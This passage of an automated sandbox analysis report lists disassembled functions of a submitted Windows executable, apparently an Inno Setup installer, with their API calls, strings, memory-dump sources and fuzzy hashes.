                                                                                                    • Instruction Fuzzy Hash: C5812675A003188FCB14DFA8D880ADEBBF4FF88314F50416AE905AB296E738AD45CF44
                                                                                                    APIs
                                                                                                    • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407003
                                                                                                    • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040707D
                                                                                                    • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070D5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Enum$NameOpenResourceUniversal
                                                                                                    • String ID: Z
                                                                                                    • API String ID: 3604996873-1505515367
                                                                                                    • Opcode ID: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                                    • Instruction ID: 78f4b6eea80f90a9c0d6dbacb1000d6f5057f9b0a0312f2c839bfa0eabc808a5
                                                                                                    • Opcode Fuzzy Hash: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                                    • Instruction Fuzzy Hash: 14516470E04208AFDB11DF95C951AAFBBB9EF09304F1045BAE500BB3D1D778AE458B5A
                                                                                                    APIs
                                                                                                    • SetRectEmpty.USER32(?), ref: 0044D04E
                                                                                                    • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D079
                                                                                                    • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D101
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DrawText$EmptyRect
                                                                                                    • String ID:
                                                                                                    • API String ID: 182455014-2867612384
                                                                                                    • Opcode ID: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                                    • Instruction ID: ac611c4ae9e9b4e435f74cd3b872a097dcdbbef8ea8fa2dc8c743a2ef399c877
                                                                                                    • Opcode Fuzzy Hash: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                                    • Instruction Fuzzy Hash: 18517171E00248AFDB11DFA5C885BDEBBF8BF48308F18447AE845EB252D7789945CB64
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 0042EF9E
                                                                                                      • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0042EFC1
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0042F0A0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFontIndirectObjectReleaseSelect
                                                                                                    • String ID: ...\
                                                                                                    • API String ID: 3133960002-983595016
                                                                                                    • Opcode ID: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                                    • Instruction ID: de545d42c11d103cbad381cc3223c2b5efa9fdb4a6e9ae4bb0445229962d8c70
                                                                                                    • Opcode Fuzzy Hash: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                                    • Instruction Fuzzy Hash: 5A316370B00128AFDB11EB96D841BAEB7F8EB09348F90447BE410A7392D7785E49CA59
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNEL32(00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 00498280
                                                                                                    • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 004982A9
                                                                                                    • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004982C2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Attributes$Move
                                                                                                    • String ID: isRS-%.3u.tmp
                                                                                                    • API String ID: 3839737484-3657609586
                                                                                                    • Opcode ID: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                                                                    • Instruction ID: fc33356634acd7bce8b4c2965ae56e8bcff63ef6fc68eceab8a95db248f88364
                                                                                                    • Opcode Fuzzy Hash: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                                                                    • Instruction Fuzzy Hash: 0B216471E00609ABCF10EFA9C8819AFBBB8AF45714F10457FB814B72D1DB389E018A59
                                                                                                    APIs
                                                                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                                    • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExitMessageProcess
                                                                                                    • String ID: Error$Runtime error at 00000000
                                                                                                    • API String ID: 1220098344-2970929446
                                                                                                    • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                                    • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                                                    • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                                    • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                                      • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                      • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                    • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456C50
                                                                                                    • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456C7D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Type$AllocByteCharFullLoadMulusermePathRegisterStringWide
                                                                                                    • String ID: LoadTypeLib$RegisterTypeLib
                                                                                                    • API String ID: 1312246647-2435364021
                                                                                                    • Opcode ID: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                                    • Instruction ID: 3ed1135b8019c5f4588910a0035f5c9e1cabb82a18fedb82429c118dce795412
                                                                                                    • Opcode Fuzzy Hash: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                                    • Instruction Fuzzy Hash: 2911B430B00604AFDB02EFA6CD51A5EB7BDEB89705F5184B6FC44D3752DA389904CA24
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 0045716E
                                                                                                    • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045720B
                                                                                                    Strings
                                                                                                    • Failed to create DebugClientWnd, xrefs: 004571D4
                                                                                                    • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0045719A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                                    • API String ID: 3850602802-3720027226
                                                                                                    • Opcode ID: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                                    • Instruction ID: a6ca84080c04e90ac639e3db27cd2c1e4b46fe4ea5f20cae781d9f83c3d7e460
                                                                                                    • Opcode Fuzzy Hash: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                                    • Instruction Fuzzy Hash: 1011E770248240AFD710AB69AC85B5FBBD89B54319F15407AFA849B383D7798C18C7AE
                                                                                                    APIs
                                                                                                      • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                    • GetFocus.USER32 ref: 00478757
                                                                                                    • GetKeyState.USER32(0000007A), ref: 00478769
                                                                                                    • WaitMessage.USER32(?,00000000,00478790,?,00000000,004787B7,?,?,00000001,00000000,?,?,?,00480402,00000000,004812C8), ref: 00478773
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FocusMessageStateTextWaitWindow
                                                                                                    • String ID: Wnd=$%x
                                                                                                    • API String ID: 1381870634-2927251529
                                                                                                    • Opcode ID: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                                    • Instruction ID: f17a5035e7dee30901ec9a03c3a5a372f1d0714b29ccd98a4f066b2945bd060b
                                                                                                    • Opcode Fuzzy Hash: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                                    • Instruction Fuzzy Hash: CE11C634A40244AFD704EF65DC49A9EBBF8EB49314F6184BFF409E7681DB386D00CA69
                                                                                                    APIs
                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E618
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E627
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$File$LocalSystem
                                                                                                    • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                                    • API String ID: 1748579591-1013271723
                                                                                                    • Opcode ID: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                                    • Instruction ID: 5dd65cae4c1adac9d47cc9ad6336eda1851498fedff4a8a979bd050f9c4a6815
                                                                                                    • Opcode Fuzzy Hash: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                                    • Instruction Fuzzy Hash: A81136A440C3909ED340DF2AC04432BBAE4AB99704F44892EF8C8C6381E779C848DBB7
                                                                                                    APIs
                                                                                                    • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F83
                                                                                                      • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                                    • MoveFileA.KERNEL32(00000000,00000000), ref: 00453FA8
                                                                                                      • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$AttributesDeleteErrorLastMove
                                                                                                    • String ID: DeleteFile$MoveFile
                                                                                                    • API String ID: 3024442154-139070271
                                                                                                    • Opcode ID: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                                    • Instruction ID: b5871bee3d194af1fa843ac656f6d820fc0ba16d57580c91db5694710367c43f
                                                                                                    • Opcode Fuzzy Hash: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                                    • Instruction Fuzzy Hash: AEF062716142045BD701FBA2D84266EA7ECDB8435EF60443BB900BB6C3DA3C9E094529
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen
                                                                                                    • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                                    • API String ID: 47109696-2631785700
                                                                                                    • Opcode ID: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                                    • Instruction ID: 1950c6f853cc10ed35e504d9d8503a730f6ffd27dc9bba4e9fa27fab35675349
                                                                                                    • Opcode Fuzzy Hash: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                                    • Instruction Fuzzy Hash: 12F0AF31300110DBCB10EB9AD885B6F6299DB9931AF50503BF981DB293E73CCC168629
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                    • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C05
                                                                                                    • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C28
                                                                                                    Strings
                                                                                                    • CSDVersion, xrefs: 00483BFC
                                                                                                    • System\CurrentControlSet\Control\Windows, xrefs: 00483BD2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                    • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                                    • API String ID: 3677997916-1910633163
                                                                                                    • Opcode ID: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                                    • Instruction ID: 1d850e848a14c5c59b8e95f13e5f63a8fb365af486cc5d6c9f9b701d22fca986
                                                                                                    • Opcode Fuzzy Hash: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                                    • Instruction Fuzzy Hash: 56F03176E40208A6DF10EAD48C45BAFB3BCAB14B05F104967EA10F7280E678AB048B59
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                                    • API String ID: 1646373207-4063490227
                                                                                                    • Opcode ID: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                                    • Instruction ID: 657275fb9dfacbe144619f02b172540cf2f0c5a6f4252bec6bd03a25d2dd35a2
                                                                                                    • Opcode Fuzzy Hash: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                                    • Instruction Fuzzy Hash: A5E0DFE0B40B0122D70032BA1C82B6B108D4B84728F90053B3894E62D6DDBCD9840A6D
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAD0), ref: 0042EB62
                                                                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB68
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                                    • API String ID: 1646373207-260599015
                                                                                                    • Opcode ID: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                                    • Instruction ID: e1ec077e445c8734ae54db5ffdd633522f5c412f0b7fee52e54de0d29bb4c321
                                                                                                    • Opcode Fuzzy Hash: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                                    • Instruction Fuzzy Hash: A2D0C793311732665D10B1F73CD1EAB058C891527935404B7F515E5641D55DEC1115AD
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: NotifyWinEvent$user32.dll
                                                                                                    • API String ID: 1646373207-597752486
                                                                                                    • Opcode ID: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                                    • Instruction ID: 5e946f17392c81a4f172a46fe169fb9a1f72c9003761a5edf28bd31acc2f1150
                                                                                                    • Opcode Fuzzy Hash: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                                    • Instruction Fuzzy Hash: 59E012F0E417049AFF00BBB57B86B1A3A90E764719B00057FF414A6292DB7C481C4F9D
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
